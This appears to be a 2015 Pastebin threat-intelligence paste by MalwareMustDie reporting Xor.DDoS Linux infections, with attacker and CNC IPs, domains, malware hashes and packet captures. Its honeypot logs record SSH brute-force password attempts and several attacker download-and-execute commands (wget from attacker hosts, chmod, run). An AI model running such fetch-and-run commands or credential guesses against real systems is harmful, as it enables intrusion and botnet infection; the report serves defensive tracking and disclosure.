API tools faq
paste
Advertisement
MalwareMustDie

Xor.DDoS HOSTASA.ORG Updates

MalwareMustDie
Sep 14th, 2015
826
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 10.27 KB | None | 0 0
raw download clone embed print report
  1. // ------------------------
  2. // Background:
  3. // ------------------------
  4.  
  5. XOR.DDOS attack recorded from June 22th 2015 to Sept 15 2015
  6. By #MalwareMustDie - @unixfreaxjp
  7.  
  8. Additional/updates to the XOR.DDOS case reported:
  9. MMD-0033-2015Linux/XorDDoS infection incident report (CNC: HOSTASA.ORG)
  10. http://blog.malwaremustdie.org/2015/06/mmd-0033-2015-linuxxorddos-infection_23.html
  11. MalwareMustDie references on XOR.DDoS:
  12. http://blog.malwaremustdie.org/2015/07/mmd-0037-2015-bad-shellshock.html
  13. http://blog.malwaremustdie.org/2014/09/mmd-0028-2014-fuzzy-reversing-new-china.html
  14.  
  15. POINT: Hongkong and United States CNC are still actively being used.
  16.  
  17. // ------------------------
  18. // Cummulative  attacker IPs:
  19. // ------------------------
  20.  
  21. 43.229.52.79
  22. 43.229.53.28
  23. 43.229.53.49
  24. 43.229.53.63
  25. 43.229.53.88
  26. 43.255.188.139
  27. 43.255.189.16
  28.  
  29. // ------------------------
  30. // Sample brute login used:
  31. // ------------------------
  32.  
  33. 2015-06-22 19:42:27+0900 [ip=43.229.52.79] login attempt [root/1895-June]
  34. 2015-06-22 19:42:28+0900 [ip=43.229.52.79] login attempt [root/ep.123456]
  35. 2015-06-22 19:42:29+0900 [ip=43.229.52.79] login attempt [root/otrs12345]
  36. 2015-06-22 19:42:32+0900 [ip=43.229.52.79] login attempt [root/123ts3321]
  37. 2015-06-22 19:42:34+0900 [ip=43.229.52.79] login attempt [root/rw.123456]
  38. 2015-06-22 19:42:35+0900 [ip=43.229.52.79] login attempt [root/audenzio1]
  39. 2015-06-22 19:42:38+0900 [ip=43.229.52.79] login attempt [root/DROWSS@P1]
  40. 2015-06-22 19:42:39+0900 [ip=43.229.52.79] login attempt [root/bcampbell]
  41. 2015-06-22 19:42:40+0900 [ip=43.229.52.79] login attempt [root/cmarshall]
  42. 2015-06-22 19:42:43+0900 [ip=43.229.52.79] login attempt [root/dragostea]
  43. 2015-06-22 19:42:44+0900 [ip=43.229.52.79] login attempt [root/rx.123456]
  44. 2015-06-22 19:42:45+0900 [ip=43.229.52.79] login attempt [root/soigan123]
  45. 2015-06-22 19:42:48+0900 [ip=43.229.52.79] login attempt [root/adajacobs]
  46. 2015-06-22 19:42:50+0900 [ip=43.229.52.79] login attempt [root/ta.123456]
  47. 2015-06-22 19:42:51+0900 [ip=43.229.52.79] login attempt [root/aquilino1]
  48. 2015-06-22 19:42:54+0900 [ip=43.229.52.79] login attempt [root/root22222]
  49. 2015-06-22 19:42:55+0900 [ip=43.229.52.79] login attempt [root/0isPLIqsm]
  50. 2015-06-22 19:42:56+0900 [ip=43.229.52.79] login attempt [root/jmcmurray]
  51. 2015-06-22 19:42:59+0900 [ip=43.229.52.79] login attempt [root/yr.123456]
  52. 2015-06-22 19:43:00+0900 [ip=43.229.52.79] login attempt [root/vikiyulia]
  53. 2015-06-22 19:43:01+0900 [ip=43.229.52.79] login attempt [root/doriana12]
  54. 2015-06-22 19:43:04+0900 [ip=43.229.52.79] login attempt [root/casper11]
  55. 2015-06-22 19:43:06+0900 [ip=43.229.52.79] login attempt [root/yb.123456]
  56. 2015-06-22 19:43:07+0900 [ip=43.229.52.79] login attempt [root/wangyi123]
  57. 2015-06-22 19:43:10+0900 [ip=43.229.52.79] login attempt [root/uj.123456]
  58. 2015-06-22 19:43:11+0900 [ip=43.229.52.79] login attempt [root/aavishkar]
  59. 2015-06-22 19:43:12+0900 [ip=43.229.52.79] login attempt [root/046194575]
  60. 2015-06-22 19:43:15+0900 [ip=43.229.52.79] login attempt [root/marquardt]
  61. 2015-06-22 19:43:16+0900 [ip=43.229.52.79] login attempt [root/pavila123]
  62. 2015-06-22 19:43:17+0900 [ip=43.229.52.79] login attempt [root/io.123456]
  63. 2015-06-22 19:43:20+0900 [ip=43.229.52.79] login attempt [root/1234%mm&*]
  64. 2015-06-22 19:43:22+0900 [ip=43.229.52.79] login attempt [root/victoriar]
  65. 2015-06-22 19:43:23+0900 [ip=43.229.52.79] login attempt [root/in.123456]
  66. (...)
  67. 2015-09-01 13:50:34+0900 [ip=43.229.53.28] login attempt [root/!@]
  68. 2015-09-01 14:24:36+0900 [ip=43.229.53.28] login attempt [root/!@]
  69. 2015-09-01 14:58:45+0900 [ip=43.229.53.28] login attempt [root/!@]
  70. 2015-09-01 15:54:43+0900 [ip=43.229.53.28] login attempt [root/!@]
  71. 2015-09-10 13:29:00+0900 [ip=43.229.53.49] login attempt [root/!@]
  72. 2015-09-10 14:18:02+0900 [ip=43.229.53.49] login attempt [root/!@]
  73. 2015-09-11 10:58:51+0900 [ip=43.229.53.49] login attempt [root/!@]
  74. 2015-09-11 11:41:14+0900 [ip=43.229.53.49] login attempt [root/!@]
  75. 2015-09-11 12:18:56+0900 [ip=43.229.53.49] login attempt [root/!@]
  76. 2015-09-14 13:58:40+0900 [ip=43.229.53.49] login attempt [root/!@]
  77.  
  78. // ------------------------
  79. // Payload attacker & payload IP:
  80. // ------------------------
  81.  
  82. 43.229.53.90
  83.  
  84. // ------------------------
  85. // Payload downloaded by attackers log:
  86. // ------------------------
  87.  
  88. 2015-08-09 19:05:49+0900 [ip=43.229.53.88] exec command: #!/bin/sh
  89. 2015-08-09 19:05:49+0900 [ip=43.229.53.88] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
  90. 2015-08-09 19:05:49+0900 [ip=43.229.53.88] wget h00p://192.126.112.88/abf/h12
  91. 2015-08-09 19:05:52+0900 [ip=43.229.53.88] chmod +x h12
  92. 2015-08-09 19:05:52+0900 [ip=43.229.53.88] ./h12
  93.  
  94. 2015-08-25 12:45:48+0900 [ip=43.229.53.90] exec command: #!/bin/sh
  95. 2015-08-25 12:45:48+0900 [ip=43.229.53.90] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
  96. 2015-08-25 12:45:48+0900 [ip=43.229.53.90] wget h00p://43.229.53.88/abf/h121
  97. 2015-08-25 12:45:48+0900 [ip=43.229.53.90] chmod +x h121
  98. 2015-08-25 12:45:48+0900 [ip=43.229.53.90] ./h121
  99.  
  100. 2015-08-31 16:29:46+0900 [ip=43.229.53.90] exec command: #!/bin/sh
  101. 2015-08-31 16:29:46+0900 [ip=43.229.53.90] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
  102. 2015-08-31 16:29:46+0900 [ip=43.229.53.90] wget h00p://43.229.53.90/abf/i324
  103. 2015-08-31 16:29:46+0900 [ip=43.229.53.90] chmod +x i324
  104. 2015-08-31 16:29:46+0900 [ip=43.229.53.90] ./i324
  105.  
  106. 2015-09-10 13:33:49+0900 [ip=43.229.53.90] exec command: #!/bin/sh
  107. 2015-09-10 13:33:49+0900 [ip=43.229.53.90] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
  108. 2015-09-10 13:33:49+0900 [ip=43.229.53.90] wget h00p://43.229.53.90/abf/g13e
  109. 2015-09-10 13:33:49+0900 [ip=43.229.53.90] chmod +x g13e
  110. 2015-09-10 13:33:49+0900 [ip=43.229.53.90] ./g13e
  111.  
  112. 2015-09-14 14:02:02+0900 [ip=43.229.53.90] exec command: #!/bin/sh
  113. 2015-09-14 14:02:02+0900 [ip=43.229.53.90] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
  114. 2015-09-14 14:02:02+0900 [ip=43.229.53.90] wget h00p://43.229.53.90/abf/f1c3
  115. 2015-09-14 14:02:02+0900 [ip=43.229.53.90] chmod +x f1c3
  116. 2015-09-14 14:02:02+0900 [ip=43.229.53.90] ./f1c3
  117.  
  118. // ------------------------
  119. // Sample hashes (uploaded to VT):
  120. // ------------------------
  121.  
  122.  142e14d7872cbd783246d3be0396f3eb3c9fbd2c30d571ff3bd7769e00c08fcd
  123.  8d25feed690c1381f70018f5b905efbc9d8901098371cdeb8f32aa4d358210c7
  124.  a5afcc42f5eb61dc7992576195f8abb1c519d32d8c788b547d3b634277f16681
  125.  
  126. // ------------------------
  127. // CNC domains, IP, DNS:
  128. // ------------------------
  129.  
  130. aa.hostasa.org  23.234.60.143  // http downloads h00p://aa.hostasa.org/leg.rar (Xor-ed ELF trojan/downloader malware, prev known as "g.rar")
  131. ns1.hostasa.org 107.160.40.9      // cnc
  132. ns2.hostasa.org 103.240.140.152   // cnc
  133. ns3.hostasa.org 103.240.141.54    // cnc
  134. ns4.hostasa.org 192.126.126.64    // cnc
  135.  
  136. ;; AUTHORITY SECTION:
  137. hostasa.org.            3600    IN      NS      ns1cnb.domain-resolution.net.
  138. hostasa.org.            3600    IN      NS      ns4lny.domain-resolution.net.
  139. hostasa.org.            3600    IN      NS      ns3cna.domain-resolution.net.
  140. hostasa.org.            3600    IN      NS      ns2dky.domain-resolution.net.
  141.  
  142. // ------------------------
  143. // Infector & CNC IP routes:
  144. // ------------------------
  145.  
  146. 43.229.52.79||63857 | 43.229.52.0/24 | HOTNETLIMITED | HK | - | Hot Net Limited
  147. 43.229.53.28||63857 | 43.229.53.0/24 | HOTNETLIMITED | HK | - | Hot Net Limited
  148. 43.229.53.49||63857 | 43.229.53.0/24 | HOTNETLIMITED | HK | - | Hot Net Limited
  149. 43.229.53.63||63857 | 43.229.53.0/24 | HOTNETLIMITED | HK | - | Hot Net Limited
  150. 43.229.53.88||63857 | 43.229.53.0/24 | HOTNETLIMITED | HK | - | Hot Net Limited
  151. 43.255.188.139||36351 | 43.255.188.0/24 | SOFTLAYER | US | - | Sex Insex
  152. 43.255.189.16|| |  |  | HK | 0451dns.com | Shimizu Hang Road Causeway Bay Hong Kong International
  153.  
  154. 23.234.60.143||26484 | 23.234.60.0/24 | HOSTSPACE | US | hostspaces.net | Hostspace Networks LLC
  155. 107.160.40.9||40676 | 107.160.0.0/16 | AS40676 | US | psychz.net | Psychz Networks
  156. 103.240.140.152||62466 | 103.240.140.0/24 | CLEAR-DDOS-AS | CA | clear-ddos.com | ClearDDoS Technologies
  157. 103.240.141.54||62466 | 103.240.141.0/24 | CLEAR-DDOS-AS | CA | clear-ddos.com | ClearDDoS Technologies
  158. 192.126.126.64||26484 | 192.126.126.0/24 | HOSTSPACE | US | hostspaces.net | Hostspace Networks LLC
  159.  
  160. // ------------------------
  161. // Infector & CNC GeoIP
  162. // ------------------------
  163.  
  164. 43.229.52.79, , ,   Hong Kong, 22.25, 114.1667, AS
  165. 43.229.53.28, , ,   Hong Kong, 22.25, 114.1667, AS
  166. 43.229.53.49, , ,   Hong Kong, 22.25, 114.1667, AS
  167. 43.229.53.63, , ,   Hong Kong, 22.25, 114.1667, AS
  168. 43.229.53.88, , ,   Hong Kong, 22.25, 114.1667, AS
  169. 43.255.188.139, , , Hong Kong, 22.25, 114.1667, AS
  170. 43.255.189.16, , ,  Hong Kong, 22.25, 114.1667, AS
  171.  
  172. 23.234.60.143, Newark, 19711, United States, 39.7151, -75.7306
  173. 107.160.40.9, Walnut, 91789, United States, 34.0115, -117.8535
  174. 103.240.140.152, Central District, , Hong Kong, 22.2833, 114.15
  175. 103.240.141.54, Central District, , Hong Kong, 22.2833, 114.15, AS
  176. 192.126.126.64, Los Angeles, 90017, United States, 34.053, -118.2642
  177.  
  178. // ------------------------
  179. // Just some recent PoCs:
  180. // ------------------------
  181.  
  182. TCP MMD-JP.ORG:49214->192.126.126.64:3307 (ESTABLISHED)
  183. TCP MMD-JP.ORG:44325->107.160.40.9:3307 (ESTABLISHED)
  184. TCP MMD-JP.ORG:58487->23.234.60.143:http (ESTABLISHED)
  185.  
  186. 2015-09-15 06:55:12.954090 IP MMD-JP.ORG.58476 > 23.234.60.143
  187. http: Flags [P.], seq 1:215, ack 1, win 884, options [nop,nop,TS val 34190894 ecr 2820891477], length 214
  188. E..6.@.@....nJ...<..l.Ps...J......tk.........#cU
  189.  
  190. GET /leg.rar HTTP/1.1
  191. Accept: */*
  192. Accept-Language: zh-cn
  193. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
  194. Host: aa.hostasa.org
  195. Connection: Keep-Alive
  196. [...]
  197.  
  198. 2015-09-15 06:55:13.121609 IP 23.234.60.143.http > MMD-JP.ORG.58476:
  199. Flags [.], seq 1:1403, ack 215, win 54, options [nop,nop,TS val 2 820891645 ecr 34190894], length 1402
  200. E....h@.4.)#..<..nJ..P.lJ...s..i...6........#c..   ..
  201.  
  202. HTTP/1.1 200 OK
  203. Date: Tue, 15 Sep 2015 05:54:14 GMT
  204. Server: Apache
  205. Last-Modified: Sun, 07 Dec 2014 08:27:46 GMT
  206. ETag: "2475-5099c15a16480"
  207. Accept-Ranges: bytes
  208. Content-Length: 9333
  209. Keep-Alive: timeout=5, max=2048
  210. Connection: Keep-Alive
  211. Content-Type: application/x-rar-compressed
  212.  
  213. /&.{L9R$/8PE    .h.pl.~u..qqm....h.{r..v..qop....t.ls.jp..sqv....w.wn.vq..sos
  214. [...]
  215.  
  216. #MalwareMustDie!
  217. [EOF]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!